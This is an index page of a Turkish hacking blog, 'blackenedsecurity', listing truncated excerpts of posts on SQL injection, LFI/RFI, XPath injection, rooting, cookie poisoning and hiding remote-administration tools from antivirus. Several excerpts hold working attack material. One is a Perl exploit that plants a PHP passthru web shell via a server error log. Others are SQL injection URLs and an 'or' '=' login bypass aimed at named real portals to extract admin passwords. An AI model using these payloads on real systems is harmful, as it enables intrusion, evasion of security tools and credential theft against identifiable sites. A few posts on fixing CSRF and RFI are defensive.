OverFlows 101

Memory lere yapacağımız saldırılarda belirgin konsept daha önceden tanımlanmış adres boşlukları olacak. Programlama bilen lerin bildiği üzere programlama dillerinde öncelikle bufferlar açılır hafızada. Bu dökümanlarda...

Devamı

Cookie Modifying, Poisioning zayıflığı

Günümüzdeki bazı php sistemlerde şifre kullanımı tehlikeli olduğu için çok daha zayıf ve sömürüye açık olan cookie kontrol sistemleri eklendi!. Sistem şu şekilde işliyor :1-Admin...

Devamı

Uzaktan Yönetim Programlarının Virus Tarayıcıdan Kaçırılması

Bu dökümanda sizlere Uzaktan Yönetim programlarının nasıl Anti-Virüs programlarından kaçırılacağı anlatacağım. Daha fazla olduğuna eminim ama bu dökümanda 4 tanesinden bahsedeceğim. 1. Encryptors/Compressors:...

Devamı

Perl'le Yazılmış Programlar Kullanan ScriptKiddieleri Durdur

Perl gibi satır komutlu işlemlere dayanan son derece basit bi şekilde öğrenilip zarar vermek amaçlı aktif bir şekilde kullanılabilen perl exploit'ler...

Devamı

Linux Kernel için vmsplice patch

— a/fs/splice.c +++ b/fs/splice.c @@ -1179,6 +1179,9 @@ static int copy_from_user_mmap_sem(void *dst, const void __user *src, size_t n) { ...

Devamı

CSRF saldırıları ve CSRF zayıflıklarını kapatmak

CSRF nedir ?Kısaca anlatalım CSRF Cross-site request forgery anlamına gelir.Direk hacking yöntemi olmamakla - olamakla beraber sosyal mühendislikyöntemleriyle çok etkili sonuçlar vermektedir.Yöntemin mantığını size anlatıyım....

Devamı

Sql Injection Permission Bypass 1

Sql injectionda şimdiye kadar hep ' kullanarak hata aldık.Bazı güvenlikçiler ' ı yasaklayabiliyorlar.Bizi bağlarmı ? bağlamaz.Farklı bi sql fonksiyonuyla halledeceğiz CONCAT() ve CHAR()Klasik sql saldırı...

Devamı

Magic URL ve Gizli Form Güvenlik Açıkları

Selam ben blackened bu dökümanda sizlere Magic URL ve Gizli Formlardan bahsedeceğim Amaç=Bu sefer amacımız sert bir saldırı...

Devamı

Rooting 101

Rooting nedir?Rooting ,root=en yetkili kişi rooting=serverda yetkili hale gelmek...Yeterince açık sanırım başka açıklamaya gerek yok.Yöntemlere ve nerde kullanıldığına geçelim.Rooting az yetkili olduğumuz yerde çok yetkili...

Devamı

Log Locations

Bunlar LFİ için log yerleri rfi kodu geçirip rfi yapacaklarınız anlatmıştım hatırlayan sorabilir IRIX: ================= /var/adm/SYSLOG /var/adm/sulog /var/adm/utmp ...

Devamı

Sql Injection Tablo Adı Bulmak

Selam ben blackened bu dökümanda sizlere asp sistemli veritabanlarında tablo adı bulmayı örnekli olarak ,en detaylı bi şekilde anlatmaya çalışacağım.Daha önceki yazılarda anlattığım gibi...

Devamı

XPath Injection 101

XML database'larda bypass için veya tabiki veri almak için kullanılan yöntemdir.AG’s Tamino, Apache Software Foundation XIndice, Sleepycat Software Berkeley DbXML, dbXML Group dbXML,An gibi...

Devamı

LFI Perl Exploit

#!/usr/bin/perl -wuse IO::Socket;use LWP::UserAgent;$site="victim.com";$path="/folder/";$code="<? passthru($_GET[cmd]) ?>";$log = "../../../../../../../etc/httpd/logs/error_log";print "Trying to inject the code";$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$site", PeerPort=>"80") or die " Connection Failed. ";print $socket "GET ".$path.$code." HTTP/1.1 ";print...

Devamı

Local File İnclusion Saldırı Teknikleri 1

Remote file inclusion u duymuştunuz dışardan code (shell) çağırarak siteye saldırıda bulunuyorduk.Fakat local file inclusion da olay farklı bu sefer serverin içinde...

Devamı

Php de kayıt olurken admin yetkisi almak (basic)

Hemen hemen her portalda kayıt bölümleri vardır.Bu bölümlerde update komutu kullanılır.Biraz düşünürseniz aslında update komutu kullanan baya yer vardır.ÖrneğinUPDATE kullanicilar SET Name='$kullaniciadi' WHERE ID=1;Burda name...

Devamı

RFİ - Fİ Açıklarından Kurtulmak

Php kodlayanların son zamanlarda yaptığı en büyük hatalar url çeken veya yönlenen sayfalara include ederken değişken sayfa ($page) kullanmak bunun sonucu remote file inclusion...

Devamı

Php mysql İnjection'da Table ve Column Adı Bulmak 1

Php mysql injectionda tablolar ve columnlar information_schema dosyasında bulunur bunları almak için bir önceki dökümanda anlattığım gibi ?id=-1 gibi linklerde inject ederek kullanabiliriz.information_schema.tables bize tablo...

Devamı

BLACKENEDSECURİTY BLOGUNA HOŞ GELDİNİZ

blackenedsecurity bloguna hoş geldiniz bu siteden alacağınız bilgiler güvenlik amaçlıdır kullanımınız sonucu doğabilecek sorunlardan sorumlu değilim birde lütfen alıntı yaparken kaynak gösteriniz. yorum yapmak serbesttir...

Devamı

Php'de Sql İnjection Teknikleri 1

$username = $_POST['username']; query = "SELECT * FROM users WHERE username='" . sql_quote($username) . "'";burda gördüğünüz temiz ve çok basit bir php kodu ve...

Devamı

Buglarım 3 (EBOSWEB dershane portalı Sql Bypass)

Ebosweb dershane portalında 2 tür açık (http://blackenedsecurity.blogcu.com) buldum 1.si öğrenci girişinde bypass açığı var(yani şifresiz erişim)exploit: boş alanlara 'or' '=' girerizörnek site : http://www.ebos.com.tr/EbosWeb/ASP/form1.aspEbosweb dershane...

Devamı

Buglarım 2 (TEKMAN PORTAL 2.0 ve Bütün Versiyonlar)

Tekmanx Portalı 2.0 ve Diğer Versiyonlarında Sql İnjection AçığıTekmanx portal 2.0 ı daha vermemişler (http://blackenedsecurity.blogcu.com) ama eski versiyonlarının kaynak kodları var http://www.tekmanx.net/dowlayt_cat.asp?iCat=100exploit:http://www.tekmanx.net/list.asp?Cat_id=42%20union%20select+0,0,sifre,2,3,4,5+from%20yonet83470205b9eefee6749cd4313ca97520 ...

Devamı

Buglarım 1 (Turuncu Portal 1.1 ve Bütün Versiyonlar)

Turuncu portal 1,1 ve bütün versiyonlarıTuruncu portalın bir önceki versiyonunun haber bölümünde bir sql injection açığı vardı.Yeni versiyonunda bu açığı kapatmıslar ama bu (http://blackenedsecurity.blogcu.com/)üyelerin ulaşabildiği...

Devamı

Arkadaşların Burada !
Arkadaşların Burada !